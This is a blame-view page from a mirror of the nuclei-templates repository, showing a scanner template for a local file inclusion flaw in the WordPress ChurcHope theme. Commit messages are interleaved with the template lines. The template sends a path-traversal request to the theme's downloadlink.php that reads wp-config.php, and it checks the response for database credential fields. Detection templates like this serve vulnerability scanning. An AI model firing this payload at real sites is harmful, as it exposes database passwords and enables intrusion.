daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/vulnerabilities/wordpress/churchope-lfi.yaml

33 lines
959 B
YAML
Raw Normal View History

Update and rename churchope-application-lfi.yaml to churchope-lfi.yaml
2022-02-14 21:20:20 +00:00
id: churchope-lfi
Create churchope-application-lfi.yaml
2022-02-12 17:48:53 +00:00
info:
Dashboard Content Enhancements (#4157) * Enhancement: exposures/files/joomla-file-listing.yaml by cs * Enhancement: cves/2019/CVE-2019-5418.yaml by mp * Enhancement: cves/2016/CVE-2016-10940.yaml by mp * Enhancement: cves/2015/CVE-2015-4694.yaml by mp * Enhancement: cves/2016/CVE-2016-10960.yaml by mp * Enhancement: cves/2021/CVE-2021-20091.yaml by mp * Enhancement: cves/2021/CVE-2021-20092.yaml by mp * Enhancement: vulnerabilities/other/solar-log-authbypass.yaml by mp * Enhancement: vulnerabilities/wordpress/churchope-lfi.yaml by mp * Enhancement: vulnerabilities/other/solar-log-authbypass.yaml by mp * Enhancement: cves/2017/CVE-2017-10075.yaml by mp * Enhancement: cves/2021/CVE-2021-27358.yaml by mp * Enhancement: cves/2017/CVE-2017-9833.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-spot-premium-lfi.yaml by mp * Enhancement: misconfiguration/symfony-debugmode.yaml by mp * Enhancement: cves/2016/CVE-2016-10940.yaml by mp * Enhancement: cves/2015/CVE-2015-4694.yaml by mp * Enhancement: cves/2016/CVE-2016-10960.yaml by mp * Enhancement: cves/2015/CVE-2015-4694.yaml by mp * Enhancement: vulnerabilities/wordpress/churchope-lfi.yaml by mp * Enhancement: cves/2017/CVE-2017-10075.yaml by mp * Enhancement: cves/2021/CVE-2021-27358.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-spot-premium-lfi.yaml by mp * Enhancement: vulnerabilities/wordpress/newsletter-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/newsletter-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/pieregister-open-redirect.yaml by mp * Enhancement: cves/2021/CVE-2021-25055.yaml by mp * Enhancement: cves/2021/CVE-2021-25028.yaml by mp * Enhancement: vulnerabilities/wordpress/noptin-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/elex-woocommerce-xss.yaml by mp * Enhancement: vulnerabilities/wordpress/my-chatbot-xss.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-adaptive-xss.yaml by mp * Enhancement: cves/2021/CVE-2021-24947.yaml by mp * Enhancement: cves/2021/CVE-2021-24406.yaml by mp * Enhancement: vulnerabilities/wordpress/elementorpage-open-redirect.yaml by mp * Enhancement: cves/2016/CVE-2016-10033.yaml by mp * Enhancement: cves/2021/CVE-2021-31682.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-woocommerce-file-download.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: vulnerabilities/wordpress/newsletter-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/pieregister-open-redirect.yaml by mp * Enhancement: cves/2021/CVE-2021-25055.yaml by mp * Enhancement: cves/2021/CVE-2021-25028.yaml by mp * Enhancement: vulnerabilities/wordpress/noptin-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/elex-woocommerce-xss.yaml by mp * Enhancement: cves/2021/CVE-2021-24947.yaml by mp * Enhancement: cves/2021/CVE-2021-24406.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2016/CVE-2016-10033.yaml by mp * Enhancement: vulnerabilities/wordpress/elementorpage-open-redirect.yaml by mp * Enhancement: cves/2021/CVE-2021-24406.yaml by mp * Relocating to CVE folder * Enhancement: cves/2017/CVE-2017-14651.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml by mp * Enhancement: cves/2019/CVE-2019-2729.yaml by mp * Enhancement: cves/2018/CVE-2018-2893.yaml by mp * Enhancement: cves/2018/CVE-2018-2628.yaml by mp * Enhancement: cves/2018/CVE-2018-3238.yaml by mp * Enhancement: cves/2018/CVE-2018-3238.yaml by mp * Enhancement: cves/2017/CVE-2017-3528.yaml by mp * Enhancement: cves/2019/CVE-2019-2588.yaml by mp * Enhancement: cves/2021/CVE-2021-31755.yaml by mp * Enhancement: cves/2021/CVE-2021-42071.yaml by mp * Enhancement: misconfiguration/zabbix-dashboards-access.yaml by mp * Enhancement: cves/2017/CVE-2017-14651.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml by mp * Enhancement: cves/2019/CVE-2019-2729.yaml by mp * Enhancement: cves/2018/CVE-2018-2893.yaml by mp * Enhancement: cves/2018/CVE-2018-3238.yaml by mp * Enhancement: cves/2017/CVE-2017-3528.yaml by mp * Enhancement: cves/2021/CVE-2021-42071.yaml by mp * Syntax corrections Added some cve-id fields Removed duplicate dashboard comments * Tag typo Co-authored-by: sullo <sullo@cirt.net>
2022-04-15 16:39:44 +00:00
name: WordPress ChurcHope Theme <= 2.1 - Local File Inclusion
Create churchope-application-lfi.yaml
2022-02-12 17:48:53 +00:00
author: dhiyaneshDK
severity: high
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes
2022-04-22 10:38:41 +00:00
description: WordPress ChurcHope Theme <= 2.1 is susceptible to local file inclusion. The vulnerability is caused by improper filtration of user-supplied input passed via the 'file' HTTP GET parameter to the '/lib/downloadlink.php' script, which is publicly accessible.
reference:
- https://wpscan.com/vulnerability/3c5833bd-1fe0-4eba-97aa-7d3a0c8fda15
Dashboard Content Enhancements (#4157) * Enhancement: exposures/files/joomla-file-listing.yaml by cs * Enhancement: cves/2019/CVE-2019-5418.yaml by mp * Enhancement: cves/2016/CVE-2016-10940.yaml by mp * Enhancement: cves/2015/CVE-2015-4694.yaml by mp * Enhancement: cves/2016/CVE-2016-10960.yaml by mp * Enhancement: cves/2021/CVE-2021-20091.yaml by mp * Enhancement: cves/2021/CVE-2021-20092.yaml by mp * Enhancement: vulnerabilities/other/solar-log-authbypass.yaml by mp * Enhancement: vulnerabilities/wordpress/churchope-lfi.yaml by mp * Enhancement: vulnerabilities/other/solar-log-authbypass.yaml by mp * Enhancement: cves/2017/CVE-2017-10075.yaml by mp * Enhancement: cves/2021/CVE-2021-27358.yaml by mp * Enhancement: cves/2017/CVE-2017-9833.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-spot-premium-lfi.yaml by mp * Enhancement: misconfiguration/symfony-debugmode.yaml by mp * Enhancement: cves/2016/CVE-2016-10940.yaml by mp * Enhancement: cves/2015/CVE-2015-4694.yaml by mp * Enhancement: cves/2016/CVE-2016-10960.yaml by mp * Enhancement: cves/2015/CVE-2015-4694.yaml by mp * Enhancement: vulnerabilities/wordpress/churchope-lfi.yaml by mp * Enhancement: cves/2017/CVE-2017-10075.yaml by mp * Enhancement: cves/2021/CVE-2021-27358.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-spot-premium-lfi.yaml by mp * Enhancement: vulnerabilities/wordpress/newsletter-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/newsletter-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/pieregister-open-redirect.yaml by mp * Enhancement: cves/2021/CVE-2021-25055.yaml by mp * Enhancement: cves/2021/CVE-2021-25028.yaml by mp * Enhancement: vulnerabilities/wordpress/noptin-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/elex-woocommerce-xss.yaml by mp * Enhancement: vulnerabilities/wordpress/my-chatbot-xss.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-adaptive-xss.yaml by mp * Enhancement: cves/2021/CVE-2021-24947.yaml by mp * Enhancement: cves/2021/CVE-2021-24406.yaml by mp * Enhancement: vulnerabilities/wordpress/elementorpage-open-redirect.yaml by mp * Enhancement: cves/2016/CVE-2016-10033.yaml by mp * Enhancement: cves/2021/CVE-2021-31682.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-woocommerce-file-download.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: vulnerabilities/wordpress/newsletter-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/pieregister-open-redirect.yaml by mp * Enhancement: cves/2021/CVE-2021-25055.yaml by mp * Enhancement: cves/2021/CVE-2021-25028.yaml by mp * Enhancement: vulnerabilities/wordpress/noptin-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/elex-woocommerce-xss.yaml by mp * Enhancement: cves/2021/CVE-2021-24947.yaml by mp * Enhancement: cves/2021/CVE-2021-24406.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2016/CVE-2016-10033.yaml by mp * Enhancement: vulnerabilities/wordpress/elementorpage-open-redirect.yaml by mp * Enhancement: cves/2021/CVE-2021-24406.yaml by mp * Relocating to CVE folder * Enhancement: cves/2017/CVE-2017-14651.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml by mp * Enhancement: cves/2019/CVE-2019-2729.yaml by mp * Enhancement: cves/2018/CVE-2018-2893.yaml by mp * Enhancement: cves/2018/CVE-2018-2628.yaml by mp * Enhancement: cves/2018/CVE-2018-3238.yaml by mp * Enhancement: cves/2018/CVE-2018-3238.yaml by mp * Enhancement: cves/2017/CVE-2017-3528.yaml by mp * Enhancement: cves/2019/CVE-2019-2588.yaml by mp * Enhancement: cves/2021/CVE-2021-31755.yaml by mp * Enhancement: cves/2021/CVE-2021-42071.yaml by mp * Enhancement: misconfiguration/zabbix-dashboards-access.yaml by mp * Enhancement: cves/2017/CVE-2017-14651.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml by mp * Enhancement: cves/2019/CVE-2019-2729.yaml by mp * Enhancement: cves/2018/CVE-2018-2893.yaml by mp * Enhancement: cves/2018/CVE-2018-3238.yaml by mp * Enhancement: cves/2017/CVE-2017-3528.yaml by mp * Enhancement: cves/2021/CVE-2021-42071.yaml by mp * Syntax corrections Added some cve-id fields Removed duplicate dashboard comments * Tag typo Co-authored-by: sullo <sullo@cirt.net>
2022-04-15 16:39:44 +00:00
classification:
cwe-id: CWE-22
Auto Generated CVE annotations [Sat Aug 27 04:41:18 UTC 2022] :robot:
2022-08-27 04:41:18 +00:00
tags: wp,wpscan,wordpress,wp-theme,lfi
Create churchope-application-lfi.yaml
2022-02-12 17:48:53 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
Update and rename churchope-application-lfi.yaml to churchope-lfi.yaml
2022-02-14 21:20:20 +00:00
part: body
Create churchope-application-lfi.yaml
2022-02-12 17:48:53 +00:00
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200
Dashboard Content Enhancements (#4157) * Enhancement: exposures/files/joomla-file-listing.yaml by cs * Enhancement: cves/2019/CVE-2019-5418.yaml by mp * Enhancement: cves/2016/CVE-2016-10940.yaml by mp * Enhancement: cves/2015/CVE-2015-4694.yaml by mp * Enhancement: cves/2016/CVE-2016-10960.yaml by mp * Enhancement: cves/2021/CVE-2021-20091.yaml by mp * Enhancement: cves/2021/CVE-2021-20092.yaml by mp * Enhancement: vulnerabilities/other/solar-log-authbypass.yaml by mp * Enhancement: vulnerabilities/wordpress/churchope-lfi.yaml by mp * Enhancement: vulnerabilities/other/solar-log-authbypass.yaml by mp * Enhancement: cves/2017/CVE-2017-10075.yaml by mp * Enhancement: cves/2021/CVE-2021-27358.yaml by mp * Enhancement: cves/2017/CVE-2017-9833.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-spot-premium-lfi.yaml by mp * Enhancement: misconfiguration/symfony-debugmode.yaml by mp * Enhancement: cves/2016/CVE-2016-10940.yaml by mp * Enhancement: cves/2015/CVE-2015-4694.yaml by mp * Enhancement: cves/2016/CVE-2016-10960.yaml by mp * Enhancement: cves/2015/CVE-2015-4694.yaml by mp * Enhancement: vulnerabilities/wordpress/churchope-lfi.yaml by mp * Enhancement: cves/2017/CVE-2017-10075.yaml by mp * Enhancement: cves/2021/CVE-2021-27358.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-spot-premium-lfi.yaml by mp * Enhancement: vulnerabilities/wordpress/newsletter-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/newsletter-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/pieregister-open-redirect.yaml by mp * Enhancement: cves/2021/CVE-2021-25055.yaml by mp * Enhancement: cves/2021/CVE-2021-25028.yaml by mp * Enhancement: vulnerabilities/wordpress/noptin-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/elex-woocommerce-xss.yaml by mp * Enhancement: vulnerabilities/wordpress/my-chatbot-xss.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-adaptive-xss.yaml by mp * Enhancement: cves/2021/CVE-2021-24947.yaml by mp * Enhancement: cves/2021/CVE-2021-24406.yaml by mp * Enhancement: vulnerabilities/wordpress/elementorpage-open-redirect.yaml by mp * Enhancement: cves/2016/CVE-2016-10033.yaml by mp * Enhancement: cves/2021/CVE-2021-31682.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-woocommerce-file-download.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: vulnerabilities/wordpress/newsletter-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/pieregister-open-redirect.yaml by mp * Enhancement: cves/2021/CVE-2021-25055.yaml by mp * Enhancement: cves/2021/CVE-2021-25028.yaml by mp * Enhancement: vulnerabilities/wordpress/noptin-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/elex-woocommerce-xss.yaml by mp * Enhancement: cves/2021/CVE-2021-24947.yaml by mp * Enhancement: cves/2021/CVE-2021-24406.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2016/CVE-2016-10033.yaml by mp * Enhancement: vulnerabilities/wordpress/elementorpage-open-redirect.yaml by mp * Enhancement: cves/2021/CVE-2021-24406.yaml by mp * Relocating to CVE folder * Enhancement: cves/2017/CVE-2017-14651.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml by mp * Enhancement: cves/2019/CVE-2019-2729.yaml by mp * Enhancement: cves/2018/CVE-2018-2893.yaml by mp * Enhancement: cves/2018/CVE-2018-2628.yaml by mp * Enhancement: cves/2018/CVE-2018-3238.yaml by mp * Enhancement: cves/2018/CVE-2018-3238.yaml by mp * Enhancement: cves/2017/CVE-2017-3528.yaml by mp * Enhancement: cves/2019/CVE-2019-2588.yaml by mp * Enhancement: cves/2021/CVE-2021-31755.yaml by mp * Enhancement: cves/2021/CVE-2021-42071.yaml by mp * Enhancement: misconfiguration/zabbix-dashboards-access.yaml by mp * Enhancement: cves/2017/CVE-2017-14651.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml by mp * Enhancement: cves/2019/CVE-2019-2729.yaml by mp * Enhancement: cves/2018/CVE-2018-2893.yaml by mp * Enhancement: cves/2018/CVE-2018-3238.yaml by mp * Enhancement: cves/2017/CVE-2017-3528.yaml by mp * Enhancement: cves/2021/CVE-2021-42071.yaml by mp * Syntax corrections Added some cve-id fields Removed duplicate dashboard comments * Tag typo Co-authored-by: sullo <sullo@cirt.net>
2022-04-15 16:39:44 +00:00
# Enhanced by mp on 2022/04/12